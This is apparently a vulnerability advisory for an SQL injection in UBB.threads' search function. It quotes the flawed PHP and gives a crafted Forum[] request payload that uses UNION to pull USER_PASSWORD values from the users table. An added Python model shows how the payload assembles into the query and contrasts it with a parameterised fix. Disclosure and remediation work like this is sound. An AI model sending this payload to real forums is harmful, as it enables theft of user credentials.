BUGTRAQ ID: 31074
CNCAN ID: CNCAN-2008091108

UBB.threads is a PHP-based forum application.

The UBB.threads search function is vulnerable to SQL injection. A remote attacker can exploit it to read sensitive information from, or manipulate, the database.

The problem is in dosearch.inc.php:

// The forums we are searching will be in a different format
// depending on where we are coming from
if (@is_array($_POST['Forum'])) {
    $Forum = join(",",$_POST['Forum']);
} elseif (@is_array($_GET['Forum'])) {
    $Forum = join(",",$_GET['Forum']);
} elseif (isset($_POST['Forum'])) {
    $Forum = ",{$_POST['Forum']},";
} elseif (isset($_GET['Forum'])) {
    $Forum = ",{$_GET['Forum']},";
} else {
    $Forum = "";
}

In the code above, $Forum is assigned unsanitised GPC (GET/POST) data under several different conditions. The following code then runs:

// Now we need to figure out what forums we are searching
$catin = "";
$boardin = "";
$allforums = "";
$forumlist = "";
$Forum = split(",",$Forum);
for($i=0;$i
    [the remainder of the loop header and the first part of the loop body are
     missing from the advisory text; the fragment resumes inside a nested foreach]
                                                        $kids) {
                if (in_array($bnum,$kids) && !preg_match("/'$fid'/",$boardin)) {
                    $boardin .="'$fid',";
                } // end if
            } // end foreach
        }
    }
}
$catin = preg_replace("/,$/","",$catin);
$boardin = preg_replace("/,$/","",$boardin);
$forumlist = preg_replace("/,$/","",$forumlist);
if ($catin) {
    $catin = "CATEGORY_ID IN ($catin)";
    if ($boardin) {
        $catin .= " OR ";
    }
}
if ($boardin) {
    $boardin = "FORUM_ID IN ($boardin)";
}
if (!$catin && !$boardin) {
    $catin = "1";
}
// Regular query here, since all query vars come from within the script
$query = "
    SELECT FORUM_ID,FORUM_TITLE,CATEGORY_ID,FORUM_IS_ACTIVE
    FROM {$config['TABLE_PREFIX']}FORUMS
    WHERE FORUM_IS_ACTIVE = '1'
    AND ($catin $boardin)
";
$sth = $dbh -> do_query($query,__LINE__,__FILE__);
$boardin = "";

The comment above the query is mistaken: $catin and $boardin are built from the request's Forum values, and each value is interpolated into the IN (...) list as '$fid' with no validation beyond the surrounding single quotes.

Because the value is split on commas (so no single token can contain one) and each token is wrapped in single quotes before being concatenated into the query, exploitation takes some care. The following search request nevertheless executes an injected SQL query: each Forum[] element becomes one quoted token, and the commas that the join/split places between tokens supply the separators the UNION column list and the MID() arguments need (%2b is a URL-encoded '+'):

ubb=dosearch
&fromsearch=1
&Words=test
&Forum[]=f-99')) UNION SELECT '1
&Forum[]=f' %2b MID('' %2b USER_PASSWORD %2b '
&Forum[]=f1
&Forum[]=f1') %2b '
&Forum[]=f1
&Forum[]=f1' FROM ubbt_USERS/*

Groupee UBB.threads 7.3.1: patch information is available at the following link:

http://www.ubbcentral.com/forums/ubbthreads.php/topics/216722/
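To make the assembly concrete, here is an added Python model of how the Forum[] values above become the FORUM_ID IN (...) list, with the advisory's payload pushed through it and a parameterised version beside it. This is example code written for this page, not UBB.threads code. Two things are assumptions: the part of the loop body that the advisory text truncates is modelled as "tokens starting with f are forum ids, tokens starting with c are category ids, the prefix is stripped and the rest appended unchanged", and the table prefix is taken to be ubbt_ because the payload references ubbt_USERS.

```python
"""Model of how dosearch.inc.php turns the Forum[] request values into SQL.

Added example, not UBB.threads code. It reproduces the join/split and the
"'$fid'," concatenation shown in the advisory, assembles the advisory's payload
through it, and contrasts a whitelisted, parameterised version. ASSUMPTION: the
loop body (truncated in the advisory text) treats tokens starting with 'f' as
forum ids and 'c' as category ids, strips that prefix and appends the remainder
unchanged. TABLE_PREFIX 'ubbt_' is assumed from the payload's ubbt_USERS.
"""
import re
import sqlite3

TABLE_PREFIX = "ubbt_"  # assumed value of $config['TABLE_PREFIX']

# The six Forum[] values from the advisory's request, URL-decoded (%2b -> '+').
ADVISORY_PAYLOAD = [
    "f-99')) UNION SELECT '1",
    "f' + MID('' + USER_PASSWORD + '",
    "f1",
    "f1') + '",
    "f1",
    "f1' FROM ubbt_USERS/*",
]

SELECT_HEAD = (
    "SELECT FORUM_ID,FORUM_TITLE,CATEGORY_ID,FORUM_IS_ACTIVE "
    f"FROM {TABLE_PREFIX}FORUMS WHERE FORUM_IS_ACTIVE = '1' AND "
)


def build_query_vulnerable(forum_param):
    """forum_param: list for Forum[]=..., str for Forum=..., None if absent."""
    # join(",", $_POST['Forum'])  /  ",{$_POST['Forum']},"  /  ""
    if isinstance(forum_param, list):
        forum = ",".join(forum_param)
    elif forum_param is not None:
        forum = f",{forum_param},"
    else:
        forum = ""
    tokens = forum.split(",")  # split(",", $Forum): a token can never hold a comma
    catin = boardin = ""
    for tok in tokens:  # ASSUMED loop body, see module docstring
        if tok.startswith("f"):
            boardin += f"'{tok[1:]}',"  # $boardin .= "'$fid',"  (no escaping, no cast)
        elif tok.startswith("c"):
            catin += f"'{tok[1:]}',"
    catin = re.sub(r",$", "", catin)
    boardin = re.sub(r",$", "", boardin)
    if catin:
        catin = f"CATEGORY_ID IN ({catin})"
        if boardin:
            catin += " OR "
    if boardin:
        boardin = f"FORUM_ID IN ({boardin})"
    if not catin and not boardin:
        catin = "1"
    return SELECT_HEAD + f"({catin} {boardin})"


def build_query_hardened(forum_param):
    """Whitelist each token as f<digits> / c<digits> and bind the ids as parameters."""
    if forum_param is None:
        values = []
    elif isinstance(forum_param, list):
        values = forum_param
    else:
        values = [forum_param]
    fids, cids = [], []
    for tok in values:
        m = re.fullmatch(r"([fc])([0-9]{1,9})", tok)
        if m is None:
            raise ValueError(f"rejected Forum value {tok!r}")
        (fids if m.group(1) == "f" else cids).append(int(m.group(2)))
    clauses, params = [], []
    if cids:
        clauses.append("CATEGORY_ID IN (" + ",".join("?" * len(cids)) + ")")
        params.extend(cids)
    if fids:
        clauses.append("FORUM_ID IN (" + ",".join("?" * len(fids)) + ")")
        params.extend(fids)
    where = " OR ".join(clauses) if clauses else "1"
    return SELECT_HEAD + f"({where})", params


def hardened_rejects(forum_param):
    """True if the whitelist refuses the request outright."""
    try:
        build_query_hardened(forum_param)
    except ValueError:
        return True
    return False


def active_forum_ids(forum_param):
    """Run the hardened query against a constructed in-memory FORUMS table."""
    sql, params = build_query_hardened(forum_param)
    con = sqlite3.connect(":memory:")
    con.execute(f"CREATE TABLE {TABLE_PREFIX}FORUMS "
                "(FORUM_ID INTEGER, FORUM_TITLE TEXT, CATEGORY_ID INTEGER, FORUM_IS_ACTIVE TEXT)")
    con.executemany(f"INSERT INTO {TABLE_PREFIX}FORUMS VALUES (?,?,?,?)",
                    [(1, "General", 1, "1"), (2, "Archived", 1, "0"), (3, "Dev", 2, "1")])
    return sorted(row[0] for row in con.execute(sql, params))


if __name__ == "__main__":
    print(build_query_vulnerable(ADVISORY_PAYLOAD))
    print(build_query_hardened(["f3", "c1"]))
    print(hardened_rejects(ADVISORY_PAYLOAD), active_forum_ids(["f3", "c1"]))
```

Running the payload through the vulnerable assembly yields a WHERE clause ending in `( FORUM_ID IN ('-99')) UNION SELECT '1','' + MID('' + USER_PASSWORD + '','1','1') + '','1','1' FROM ubbt_USERS/*'))`: the first token's `'))` closes both the IN list and the outer parenthesis, the four UNION columns match the four selected columns, and the trailing `/*` comments out the `')` the script appends. The hardened version rejects every payload token at the whitelist and never interpolates request data into the query text.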